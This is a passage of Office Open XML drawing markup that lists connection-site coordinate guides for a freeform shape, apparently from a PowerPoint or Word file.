              <a:gd name="connsiteX30" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY30" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 19292 w 4127976"/>
              <a:gd name="connsiteY31" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 6414 w 4127976"/>
              <a:gd name="connsiteY32" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 862 w 4127976"/>
              <a:gd name="connsiteY33" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 0 w 4127976"/>
              <a:gd name="connsiteY34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7363 w 4127976"/>
              <a:gd name="connsiteY12" fmla="*/ 6988764 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 18853 w 4127976"/>
              <a:gd name="connsiteY13" fmla="*/ 6981739 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 21919 w 4127976"/>
              <a:gd name="connsiteY14" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 47162 w 4127976"/>
              <a:gd name="connsiteY15" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 68017 w 4127976"/>
              <a:gd name="connsiteY16" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4090259 w 4127976"/>
              <a:gd name="connsiteY17" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4123786 w 4127976"/>
              <a:gd name="connsiteY18" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 4123785 w 4127976"/>
              <a:gd name="connsiteY19" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 4090258 w 4127976"/>
              <a:gd name="connsiteY20" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY21" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY22" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 68003 w 4127976"/>
              <a:gd name="connsiteY23" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY24" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY25" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 19986 w 4127976"/>
              <a:gd name="connsiteY26" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY27" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY28" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY29" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 19292 w 4127976"/>
              <a:gd name="connsiteY30" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 6414 w 4127976"/>
              <a:gd name="connsiteY31" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 862 w 4127976"/>
              <a:gd name="connsiteY32" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 0 w 4127976"/>
              <a:gd name="connsiteY33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7363 w 4127976"/>
              <a:gd name="connsiteY12" fmla="*/ 6988764 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 21919 w 4127976"/>
              <a:gd name="connsiteY13" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 47162 w 4127976"/>
              <a:gd name="connsiteY14" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 68017 w 4127976"/>
              <a:gd name="connsiteY15" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4090259 w 4127976"/>
              <a:gd name="connsiteY16" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4123786 w 4127976"/>
              <a:gd name="connsiteY17" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4123785 w 4127976"/>
              <a:gd name="connsiteY18" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 4090258 w 4127976"/>
              <a:gd name="connsiteY19" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY20" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY21" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 68003 w 4127976"/>
              <a:gd name="connsiteY22" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY23" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY24" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 19986 w 4127976"/>
              <a:gd name="connsiteY25" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY26" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY27" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY28" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 19292 w 4127976"/>
              <a:gd name="connsiteY29" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 6414 w 4127976"/>
              <a:gd name="connsiteY30" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 862 w 4127976"/>
              <a:gd name="connsiteY31" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 0 w 4127976"/>
              <a:gd name="connsiteY32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1919 w 4127976"/>
              <a:gd name="connsiteY12" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 47162 w 4127976"/>
              <a:gd name="connsiteY13" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 68017 w 4127976"/>
              <a:gd name="connsiteY14" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4090259 w 4127976"/>
              <a:gd name="connsiteY15" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4123786 w 4127976"/>
              <a:gd name="connsiteY16" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4123785 w 4127976"/>
              <a:gd name="connsiteY17" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4090258 w 4127976"/>
              <a:gd name="connsiteY18" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY19" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY20" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 68003 w 4127976"/>
              <a:gd name="connsiteY21" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY22" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY23" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 19986 w 4127976"/>
              <a:gd name="connsiteY24" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY25" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY26" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY27" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 19292 w 4127976"/>
              <a:gd name="connsiteY28" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 6414 w 4127976"/>
              <a:gd name="connsiteY29" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 862 w 4127976"/>
              <a:gd name="connsiteY30" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 0 w 4127976"/>
              <a:gd name="connsiteY31" fmla="*/ 7915797 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4127114"/>
              <a:gd name="connsiteY0" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 6738 w 4127114"/>
              <a:gd name="connsiteY1" fmla="*/ 7873197 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 3577 w 4127114"/>
              <a:gd name="connsiteY2" fmla="*/ 7844441 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 11720 w 4127114"/>
              <a:gd name="connsiteY3" fmla="*/ 7790887 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 19223 w 4127114"/>
              <a:gd name="connsiteY4" fmla="*/ 7712540 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 27219 w 4127114"/>
              <a:gd name="connsiteY5" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 29668 w 4127114"/>
              <a:gd name="connsiteY6" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 29668 w 4127114"/>
              <a:gd name="connsiteY7" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 26931 w 4127114"/>
              <a:gd name="connsiteY8" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 29668 w 4127114"/>
              <a:gd name="connsiteY9" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 25940 w 4127114"/>
              <a:gd name="connsiteY10" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 29668 w 4127114"/>
              <a:gd name="connsiteY11" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 21057 w 4127114"/>
              <a:gd name="connsiteY12" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 46300 w 4127114"/>
              <a:gd name="connsiteY13" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 67155 w 4127114"/>
              <a:gd name="connsiteY14" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4089397 w 4127114"/>
              <a:gd name="connsiteY15" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4122924 w 4127114"/>
              <a:gd name="connsiteY16" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4122923 w 4127114"/>
              <a:gd name="connsiteY17" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4089396 w 4127114"/>
              <a:gd name="connsiteY18" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 4071889 w 4127114"/>
              <a:gd name="connsiteY19" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 4071889 w 4127114"/>
              <a:gd name="connsiteY20" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 67141 w 4127114"/>
              <a:gd name="connsiteY21" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 29668 w 4127114"/>
              <a:gd name="connsiteY22" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 29668 w 4127114"/>
              <a:gd name="connsiteY23" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 19124 w 4127114"/>
              <a:gd name="connsiteY24" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 29668 w 4127114"/>
              <a:gd name="connsiteY25" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 29668 w 4127114"/>
              <a:gd name="connsiteY26" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 29668 w 4127114"/>
              <a:gd name="connsiteY27" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 18430 w 4127114"/>
              <a:gd name="connsiteY28" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 5552 w 4127114"/>
              <a:gd name="connsiteY29" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 0 w 4127114"/>
              <a:gd name="connsiteY30" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 2074 w 4123636"/>
              <a:gd name="connsiteY0" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 3260 w 4123636"/>
              <a:gd name="connsiteY1" fmla="*/ 7873197 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 99 w 4123636"/>
              <a:gd name="connsiteY2" fmla="*/ 7844441 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 8242 w 4123636"/>
              <a:gd name="connsiteY3" fmla="*/ 7790887 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 15745 w 4123636"/>
              <a:gd name="connsiteY4" fmla="*/ 7712540 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 23741 w 4123636"/>
              <a:gd name="connsiteY5" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 26190 w 4123636"/>
              <a:gd name="connsiteY6" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 26190 w 4123636"/>
              <a:gd name="connsiteY7" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 23453 w 4123636"/>
              <a:gd name="connsiteY8" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 26190 w 4123636"/>
              <a:gd name="connsiteY9" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 22462 w 4123636"/>
              <a:gd name="connsiteY10" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 26190 w 4123636"/>
              <a:gd name="connsiteY11" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 17579 w 4123636"/>
              <a:gd name="connsiteY12" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 42822 w 4123636"/>
              <a:gd name="connsiteY13" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 63677 w 4123636"/>
              <a:gd name="connsiteY14" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4085919 w 4123636"/>
              <a:gd name="connsiteY15" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4119446 w 4123636"/>
              <a:gd name="connsiteY16" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4119445 w 4123636"/>
              <a:gd name="connsiteY17" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4085918 w 4123636"/>
              <a:gd name="connsiteY18" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 4068411 w 4123636"/>
              <a:gd name="connsiteY19" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 4068411 w 4123636"/>
              <a:gd name="connsiteY20" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 63663 w 4123636"/>
              <a:gd name="connsiteY21" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 26190 w 4123636"/>
              <a:gd name="connsiteY22" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 26190 w 4123636"/>
              <a:gd name="connsiteY23" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 15646 w 4123636"/>
              <a:gd name="connsiteY24" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 26190 w 4123636"/>
              <a:gd name="connsiteY25" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 26190 w 4123636"/>
              <a:gd name="connsiteY26" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 26190 w 4123636"/>
              <a:gd name="connsiteY27" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 14952 w 4123636"/>
              <a:gd name="connsiteY28" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 2074 w 4123636"/>
              <a:gd name="connsiteY29" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 2471 w 4124033"/>
              <a:gd name="connsiteY0" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 496 w 4124033"/>
              <a:gd name="connsiteY1" fmla="*/ 7844441 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 8639 w 4124033"/>
              <a:gd name="connsiteY2" fmla="*/ 7790887 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 16142 w 4124033"/>
              <a:gd name="connsiteY3" fmla="*/ 7712540 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 24138 w 4124033"/>
              <a:gd name="connsiteY4" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 26587 w 4124033"/>
              <a:gd name="connsiteY5" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 26587 w 4124033"/>
              <a:gd name="connsiteY6" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 23850 w 4124033"/>
              <a:gd name="connsiteY7" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 26587 w 4124033"/>
              <a:gd name="connsiteY8" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 22859 w 4124033"/>
              <a:gd name="connsiteY9" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 26587 w 4124033"/>
              <a:gd name="connsiteY10" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 17976 w 4124033"/>
              <a:gd name="connsiteY11" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 43219 w 4124033"/>
              <a:gd name="connsiteY12" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 64074 w 4124033"/>
              <a:gd name="connsiteY13" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4086316 w 4124033"/>
              <a:gd name="connsiteY14" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4119843 w 4124033"/>
              <a:gd name="connsiteY15" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4119842 w 4124033"/>
              <a:gd name="connsiteY16" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4086315 w 4124033"/>
              <a:gd name="connsiteY17" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4068808 w 4124033"/>
              <a:gd name="connsiteY18" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 4068808 w 4124033"/>
              <a:gd name="connsiteY19" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 64060 w 4124033"/>
              <a:gd name="connsiteY20" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 26587 w 4124033"/>
              <a:gd name="connsiteY21" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 26587 w 4124033"/>
              <a:gd name="connsiteY22" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 16043 w 4124033"/>
              <a:gd name="connsiteY23" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 26587 w 4124033"/>
              <a:gd name="connsiteY24" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 26587 w 4124033"/>
              <a:gd name="connsiteY25" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 26587 w 4124033"/>
              <a:gd name="connsiteY26" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 15349 w 4124033"/>
              <a:gd name="connsiteY27" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 2471 w 4124033"/>
              <a:gd name="connsiteY28" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 14853 w 4123537"/>
              <a:gd name="connsiteY0" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 4123537"/>
              <a:gd name="connsiteY1" fmla="*/ 7844441 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 8143 w 4123537"/>
              <a:gd name="connsiteY2" fmla="*/ 7790887 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 15646 w 4123537"/>
              <a:gd name="connsiteY3" fmla="*/ 7712540 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 23642 w 4123537"/>
              <a:gd name="connsiteY4" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 26091 w 4123537"/>
              <a:gd name="connsiteY5" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 26091 w 4123537"/>
              <a:gd name="connsiteY6" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 23354 w 4123537"/>
              <a:gd name="connsiteY7" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 26091 w 4123537"/>
              <a:gd name="connsiteY8" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 22363 w 4123537"/>
              <a:gd name="connsiteY9" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 26091 w 4123537"/>
              <a:gd name="connsiteY10" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 17480 w 4123537"/>
              <a:gd name="connsiteY11" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 42723 w 4123537"/>
              <a:gd name="connsiteY12" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 63578 w 4123537"/>
              <a:gd name="connsiteY13" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4085820 w 4123537"/>
              <a:gd name="connsiteY14" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4119347 w 4123537"/>
              <a:gd name="connsiteY15" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4119346 w 4123537"/>
              <a:gd name="connsiteY16" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4085819 w 4123537"/>
              <a:gd name="connsiteY17" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4068312 w 4123537"/>
              <a:gd name="connsiteY18" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 4068312 w 4123537"/>
              <a:gd name="connsiteY19" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 63564 w 4123537"/>
              <a:gd name="connsiteY20" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 26091 w 4123537"/>
              <a:gd name="connsiteY21" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 26091 w 4123537"/>
              <a:gd name="connsiteY22" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 15547 w 4123537"/>
              <a:gd name="connsiteY23" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 26091 w 4123537"/>
              <a:gd name="connsiteY24" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 26091 w 4123537"/>
              <a:gd name="connsiteY25" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 26091 w 4123537"/>
              <a:gd name="connsiteY26" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 14853 w 4123537"/>
              <a:gd name="connsiteY27" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 6714 w 4115398"/>
              <a:gd name="connsiteY0" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 4 w 4115398"/>
              <a:gd name="connsiteY1" fmla="*/ 7790887 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 7507 w 4115398"/>
              <a:gd name="connsiteY2" fmla="*/ 7712540 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 15503 w 4115398"/>
              <a:gd name="connsiteY3" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 17952 w 4115398"/>
              <a:gd name="connsiteY4" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 17952 w 4115398"/>
              <a:gd name="connsiteY5" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 15215 w 4115398"/>
              <a:gd name="connsiteY6" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 17952 w 4115398"/>
              <a:gd name="connsiteY7" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 14224 w 4115398"/>
              <a:gd name="connsiteY8" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 17952 w 4115398"/>
              <a:gd name="connsiteY9" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 9341 w 4115398"/>
              <a:gd name="connsiteY10" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 34584 w 4115398"/>
              <a:gd name="connsiteY11" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 55439 w 4115398"/>
              <a:gd name="connsiteY12" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 4077681 w 4115398"/>
              <a:gd name="connsiteY13" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4111208 w 4115398"/>
              <a:gd name="connsiteY14" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4111207 w 4115398"/>
              <a:gd name="connsiteY15" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4077680 w 4115398"/>
              <a:gd name="connsiteY16" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4060173 w 4115398"/>
              <a:gd name="connsiteY17" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4060173 w 4115398"/>
              <a:gd name="connsiteY18" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 55425 w 4115398"/>
              <a:gd name="connsiteY19" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 17952 w 4115398"/>
              <a:gd name="connsiteY20" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 17952 w 4115398"/>
              <a:gd name="connsiteY21" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 7408 w 4115398"/>
              <a:gd name="connsiteY22" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 17952 w 4115398"/>
              <a:gd name="connsiteY23" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 17952 w 4115398"/>
              <a:gd name="connsiteY24" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 17952 w 4115398"/>
              <a:gd name="connsiteY25" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 6714 w 4115398"/>
              <a:gd name="connsiteY26" fmla="*/ 8064088 h 10695515"/>
